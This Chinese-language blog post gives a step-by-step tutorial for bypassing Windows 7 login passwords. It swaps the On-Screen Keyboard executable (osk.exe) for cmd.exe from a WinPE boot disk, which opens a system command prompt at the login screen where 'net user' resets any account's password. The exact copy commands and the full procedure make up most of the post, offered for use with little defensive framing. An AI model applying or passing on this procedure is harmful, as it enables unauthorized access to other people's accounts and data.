FORECE's 博客日志 首家发布,转载请注明
刚才GOOGLE了一下,还没有类似的文章,哈哈,难道我是第一个发现这个漏洞的?这应该算是独家发布吧。WINDOWS 7 出了,不过在用户密码方面还是一样存在漏洞,和WINDOWS VISTA一样,通过替换软键盘OSK.exe文件,可以轻松更改WIN 7的密码。
黑客可轻松利用工具将WIN 7的用户密码进行更改。
本来在VISTA中就存在的漏洞,不知道为什么在WIN7中还是没有将漏洞补上。虽然做了一定得限制(在CMD中删除OSK文件会出现DENY,拒绝访问的字样),不过利用暴力删除工具依然可以进行删除。此后再进行替换,删除则不会出现任何问题。DENY字样也完全消失。
看来微软对这个漏洞还是没有做太大的重视,下边讲一下教程:
准备工具,深度WINPE 3.0
进入CMD命令提示符模式,将OSK.EXE 和 CMD.EXE 拷贝到别的地方
我的WINDOWS 7 装在E盘,请根据个人情况自行改动,执行以下命令
copy e:\windows\system32\osk.exe e:\
copy e:\windows\system32\cmd.exe e:\
然后利用深度WinPE v3.0 自带的暴力删除工具Unlocker将OSK.EXE 删除(在CMD中无法删除,WINDOWS 7有系统保护)
然后再利用CMD命令提示符,将CMD.exe 拷贝到SYSTEM32目录中,并命名为OSK.EXE
copy e:\cmd.exe e:\windows\system32\osk.exe
重新启动计算机
在登陆界面下,点击左下角辅助工具,选择On-Screen Keyboard
命令提示符就出现了,用Net User命令,就可以将用户密码更改掉,格式如下
Net user 用户名 密码
这样就重新更改了用户名密码